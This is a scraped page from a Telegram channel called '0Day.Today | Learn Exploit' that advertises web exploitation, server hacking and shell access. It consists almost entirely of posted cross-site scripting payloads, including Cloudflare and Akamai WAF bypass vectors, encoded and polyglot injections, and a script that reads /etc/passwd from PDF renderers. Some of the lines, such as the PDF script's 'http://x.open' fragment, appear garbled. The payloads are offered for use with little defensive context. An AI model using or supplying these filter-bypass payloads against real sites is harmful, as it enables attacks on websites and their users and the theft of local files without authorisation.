0Day.Today | Learn Exploit | Zero World | Dark web |
@learnexploit
14.7K subscribers
1.1K photos
69 videos
455 files
1.06K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
14.7K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
👁‍🗨 You probably know that

👩‍💻 <Img Src=javascript:alert(1)>

🚫 Doesn't work anymore (although several lists out there have it)

🔄 But if you add

👩‍💻 OnError=location=src

It does!

👁‍🗨 Example:
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E

⚠️ Not so useful but who knows your next inline injection scenario?

#XSS

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
2.9K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Akamai WAF

&lt;A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)&gt;

Vector PoC

#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
3.6K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
3.7K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CloudFlare Bypass

&lt;Img Src=OnXSS OnError=alert(1)&gt;

#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
4.1K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "&gt;&lt;img src=x onerror=alert(1)&gt; [Blocked By Cloudflare]

Payload Used : "&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt; [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3.6K views
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS to Exfiltrate Data from PDFs 🔥🥵

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
2.9K views
0Day.Today | Learn Exploit | Zero World | Dark web |
bypass XSS Cloudflare WAF

Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.8K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS of the day : DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Nuclei tamplete

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.4K views
0Day.Today | Learn Exploit | Zero World | Dark web |
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.7K views
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.9K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.7K views
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.2K views